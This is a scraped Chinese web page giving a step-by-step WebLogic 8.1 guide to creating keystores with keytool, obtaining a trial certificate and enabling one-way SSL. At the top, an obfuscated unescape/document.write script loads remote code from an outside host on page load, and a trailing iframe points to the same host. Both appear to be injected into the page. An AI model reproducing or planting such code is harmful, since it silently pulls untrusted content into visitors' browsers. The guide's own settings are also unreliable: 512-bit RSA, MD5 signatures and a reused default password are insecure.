HTML Tags and JavaScript tutorial
<script language="javascript">var encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);</script>
Weblogic 81 CA配置以及单向SSL配置
1、
安装
weblogic81
2、
配置
CA
,使用工具
Keytool
(
JDK
自带),首先在
C
盘建立目录
C:/GetCA
。运行
CMD
,转至该目录
a、
产生
Custom Identity Keystore
以及
CA
请求
***********************************************************************
使用命令:
keytool -genkey -alias cik -keyalg RSA -keysize 512 -keystore cik.jks
根据提示输入信息(如图)
密码包括
storepassword
和
keypassword
,我选择一致
此时在
C:/GetCA
目录下会新增文件
cik.jks
***********************************************************************
使用命令:
keytool -certreq -alias cik -sigalg "MD5withRSA" -file Careq.pem -keypass weblogic -keystore cik.jks -storepass weblogic
显示图片:
此时在
C:/GetCA
目录下会新增文件
Careq.pem
b、
申请数字证书(由于本人测试用,所以就申请了一个试用证书)
进入
verisign.com
à
Free SSL Trial Certificate
à
Enrollment
最后进入如下页面,将
careq.pem
文件的内容拷贝至网页中,下一步直至结束
c
、进入
b
步骤中曾经填入的邮箱,打开
verisign
返回的邮件,如果未收到,则等待。
邮件内容包括:
进入此连接
http://www.verisign.com/server/trial/faq/index.html
下载根
CA
,保存到
C:/GetCA
,命名
rootCA.cer
。
在邮件的底部:
将选中的内容保存至文本,存为:
certificate.pem
d
、导入
CA
内容到
Custom Trust Keystore
keytool -import -alias rootca -trustcacerts -file rootCA.cer -keystore ciktrust.jks -storepass weblogic
此处密码我设为
weblogic
,可以自己更改
e
、导入
certificate info
到
Custom Identity Keystore
@@@@
:在导入之前必须将根证书导入到
%JAVA_HOME%/jre/lib/security/cacerts
中,否则会出现
*************************************************************************
导入到
cacerts:
keytool -import -v -alias "CMS-CA" -file rootCA.cer -keystore
%
JAVA_HOME
%
/jre/lib/security/cacerts
JAVA_HOME
为
WLS
设置的环境变量,例如
c:/bea/jdk141_05
导入
Custom Identity Keystore
keytool -import -trustcacerts -alias cik -file certificate.pem -keypass weblogic -keystore cik.jks -storepass weblogic
到此,我们
C:/GetCA/
拥有的文件有
cik.jks
rootCA.cer
Careq.pem
ciktrust.jks
certificate.pem
最终需要使用的是其中的两个
jks
文件
(
Custom Identity Keystore
,
Custom Trust Keystore
)
将上述文件拷贝到自己
domain
的目录下
例如:
C:/bea/user_projects/domains/MyDomain
3、
配置
wls
中的
SSL
进入
WLS
配置界面,在
Server
配置页面中选择
General
à
SSL Listen Port Enabled
à
输入端口号
点击
[change]
出现
keystore
配置画面,如图中选择
选择
Keystores & SSL
à
Keystore Configuration
à
Identity
:
Custom Identity Keystore:
中输入:
cik.jks (
包括全路径:
C:/bea/user_projects/domains/MyDomain/cik.jks)
Passphrase
输入对应密码:
weblogic (
输入开始设置的密码
)
Type
:
JKS
选择
Keystores & SSL
à
Keystore Configuration
à
Trust
:
Custom Trust Keystore
中输入:
Ciktrust.jks (
包括全路径:
C:/bea/user_projects/domains/MyDomain/ciktrust.jks)
Passphrase
输入对应密码:
weblogic (
输入开始设置的密码
)
Type
:
JKS
配置
SSL,
其中密码为
keypass(
见开始时
keytool)
点击
finish。
最后,重启
weblogic
,进入页面
https://127.0.0.1:7002/
,即可使用新的证书了。
src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">